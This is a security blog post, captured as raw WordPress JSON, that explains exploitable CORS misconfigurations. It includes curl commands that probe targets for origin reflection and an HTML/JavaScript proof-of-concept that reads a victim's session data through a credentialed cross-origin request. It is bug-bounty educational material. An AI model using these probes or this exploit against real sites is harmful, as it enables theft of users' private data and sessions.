but before that here are some tips about CORS<\/strong> where it can be exploitable from the attacker’s point of view:<\/p>\n or just<\/p>\n even this is not good from the development point of view but due to its own rules of CORS if Access-Control-Allow-Origin<\/strong> set to *<\/strong>\u00a0we don’t get benefit<\/a> Access-Control-Allow-Credentials: true<\/strong> means no cookie access<\/strong> of the victim.<\/p>\n When you can’t exploit even if above\u00a0misconfigurations are present:<\/strong><\/p>\n I’m not covering basic details about CORS in this post as in earlier blog posts all the details are covered.<\/p>\n I mentioned 3 cases where first two cases are exploitable in that example of 2nd case is Facebook Messenger chat issue<\/a> which I mentioned in an earlier section of the post, and example of 1st case is mine which I found 2 days before where any arbitrary Origin<\/strong> is allowed and the same Origin<\/strong> get reflected back to\u00a0Access-Control-Allow-Origin<\/strong> with Credentials<\/strong> set to True<\/strong>, the best way I found to check for CORS issue is using CURL<\/strong>.<\/p>\n eg : OR if your burp pro user, Burp Active Scan<\/strong> may find this for you, but in this specific case the root URL was not vulnerable when I checked it manually,\u00a0 HTML Poc code:-<\/p>\n And here how it worked \ud83d\ude42<\/p>\n Sources for better understanding of CORS:<\/strong><\/p>\n Views\/Suggestions\/Edits always welcome \ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":" Hello Friends! few days before noticed a blog post for exploiting Facebook chat and reading all the chats of users so that made me to interested\u00a0to know about the issues, and basically it was misconfigured CORS configuration where null origin is allowed with credentials true, \u00a0it was not something heard for the 1st time, @albinowax […]<\/p>\n","protected":false},"author":1,"featured_media":298,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[14,13,15],"_links":{"self":[{"href":"https:\/\/www.geekboy.ninja\/blog\/wp-json\/wp\/v2\/posts\/262"}],"collection":[{"href":"https:\/\/www.geekboy.ninja\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.geekboy.ninja\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.geekboy.ninja\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.geekboy.ninja\/blog\/wp-json\/wp\/v2\/comments?post=262"}],"version-history":[{"count":41,"href":"https:\/\/www.geekboy.ninja\/blog\/wp-json\/wp\/v2\/posts\/262\/revisions"}],"predecessor-version":[{"id":754,"href":"https:\/\/www.geekboy.ninja\/blog\/wp-json\/wp\/v2\/posts\/262\/revisions\/754"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.geekboy.ninja\/blog\/wp-json\/wp\/v2\/media\/298"}],"wp:attachment":[{"href":"https:\/\/www.geekboy.ninja\/blog\/wp-json\/wp\/v2\/media?parent=262"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.geekboy.ninja\/blog\/wp-json\/wp\/v2\/categories?post=262"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.geekboy.ninja\/blog\/wp-json\/wp\/v2\/tags?post=262"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}\n
Poorly implemented, Best case for Attack:<\/h4>\n<\/li>\n<\/ul>\n
Access-Control-Allow-Origin: https:\/\/attacker.com<\/code><\/span><\/p>\nAccess-Control-Allow-Credentials: true<\/code><\/span><\/p>\n\n
Poorly implemented, Exploitable:<\/h4>\n<\/li>\n<\/ul>\n
Access-Control-Allow-Origin: null<\/code><\/span><\/p>\nAccess-Control-Allow-Credentials: true<\/code><\/span><\/p>\n\n
Bad implementation but not exploitable:<\/h4>\n<\/li>\n<\/ul>\n
Access-Control-Allow-Origin: *<\/code><\/span><\/p>\nAccess-Control-Allow-Credentials: true<\/code><\/span><\/p>\nAccess-Control-Allow-Origin: *<\/code><\/span><\/p>\n\n
curl https:\/\/test.victim.com -H \"Origin: https:\/\/geekboy.ninja\"<\/code> -I<\/span><\/em> and check the response if Origin<\/strong> is reflected in the response or not.
\n![\"\"](\"http:\/\/www.geekboy.ninja\/blog\/wp-content\/uploads\/2016\/12\/curl.jpg\")
<\/a><\/p>\ncurl https:\/\/my.target.com -H \"Origin: https:\/\/geekboy.ninja\" -I<\/code><\/span><\/em> , the Origin didn’t get reflected but when I requested specific endpoint where all users data getting back into the response curl https:\/\/my.target.com\/api\/web\/user -H \"Origin: https:\/\/geekboy.ninja\" -I<\/code><\/span><\/em> it reflected back with my host with Credentials<\/strong> set to True<\/strong> and that’s enough to make this work and steal all that data.<\/p>\n<!DOCTYPE html>\n<html>\n<body>\n<center>\n<h2>CORS POC Exploit<\/h2>\n<h3>Extract SID<\/h3>\n \n<div id=\"demo\">\n<button type=\"button\" onclick=\"cors()\">Exploit<\/button>\n<\/div>\n \n<script>\nfunction cors() {\n var xhttp = new XMLHttpRequest();\n xhttp.onreadystatechange = function() {\n if (this.readyState == 4 && this.status == 200) {\n document.getElementById(\"demo\").innerHTML = alert(this.responseText);\n }\n };\n xhttp.open(\"GET\", \"https:\/\/target.com\/info\/\", true);\n xhttp.withCredentials = true;\n xhttp.send();\n}\n<\/script>\n \n<\/body>\n<\/html><\/pre>\n![\"\"](\"http:\/\/www.geekboy.ninja\/blog\/wp-content\/uploads\/2016\/12\/cors_poc2-1-1024x660.jpg\")
<\/a><\/p>\n\n